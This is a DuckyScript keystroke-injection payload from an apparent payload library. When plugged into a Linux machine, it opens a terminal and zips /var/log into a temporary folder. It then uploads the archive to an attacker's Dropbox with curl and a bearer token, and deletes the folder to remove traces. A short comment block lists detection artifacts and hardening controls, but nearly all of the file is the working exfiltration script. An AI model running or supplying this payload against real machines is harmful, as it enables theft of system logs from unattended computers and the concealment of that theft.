Path: blob/master/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
REM ######################################################
REM #                                                    |
REM # Title        : Exfiltrate Linux Logs With Dropbox  |
REM # Author       : Aleff                               |
REM # Version      : 1.0                                 |
REM # Category     : Exfiltration, Execution             |
REM # Target       : Linux                               |
REM #                                                    |
REM ######################################################

REM Requirements:
REM     - Internet Connection
REM     - Dropbox Account
REM     -   - DROPBOX_ACCESS_TOKEN

REM Review notes (detection and hardening):
REM     - Every command below is typed into a terminal of the logged-in
REM       user, so the archive can only hold log files that this account
REM       is allowed to read.
REM     - Artifacts visible in the payload: a mktemp directory named
REM       prefix-XXXXXXXXXX under /home/<user>/tmp/, a zip -r run over
REM       /var/log/, a curl POST to content.dropboxapi.com/2/files/upload
REM       and a final rm -rf of the temporary directory.
REM     - The Dropbox token is typed as a plain shell assignment and then
REM       expanded into curl's arguments, so it may remain in shell history
REM       and process/command-line audit records; responders can use it as
REM       an identifier and have it revoked.
REM     - Relevant controls: restrictive read permissions on /var/log,
REM       screen locking and USB device authorization, and egress
REM       monitoring for upload endpoints that are not expected on the host.


REM Keyboard shortcut intended to open a terminal window
DELAY 1000
CTRL-ALT t

REM Required: the Dropbox access token is defined here (TOKEN)
DELAY 2000
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER


REM Name of the logged-in user, used to build the temporary folder path
DELAY 500
STRING USER_NAME=$(whoami)
ENTER

REM Number from shuf assigned to RANDOM
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER

REM Temporary working folder created with mktemp under /home/<user>/tmp/
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
ENTER

REM Archive file name and its full path inside the temporary folder
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
ENTER

REM Directory that gets archived (default log path)
DELAY 500
STRING LOG_PATH="/var/log/"
ENTER

REM Recursively zip the log directory into the archive path
DELAY 500
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
ENTER

REM Fixed wait for the zip step; the time actually needed varies
DELAY 10000

REM Destination path used in the Dropbox-API-Arg header
DELAY 500
STRING DROPBOX_FOLDER="/$ZIP_NAME"
ENTER

REM Upload the archive with curl to the Dropbox files/upload endpoint
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_LINK
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER

REM Fixed wait for the upload; the time actually needed varies
DELAY 5000

REM Remove the temporary folder together with the archive
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER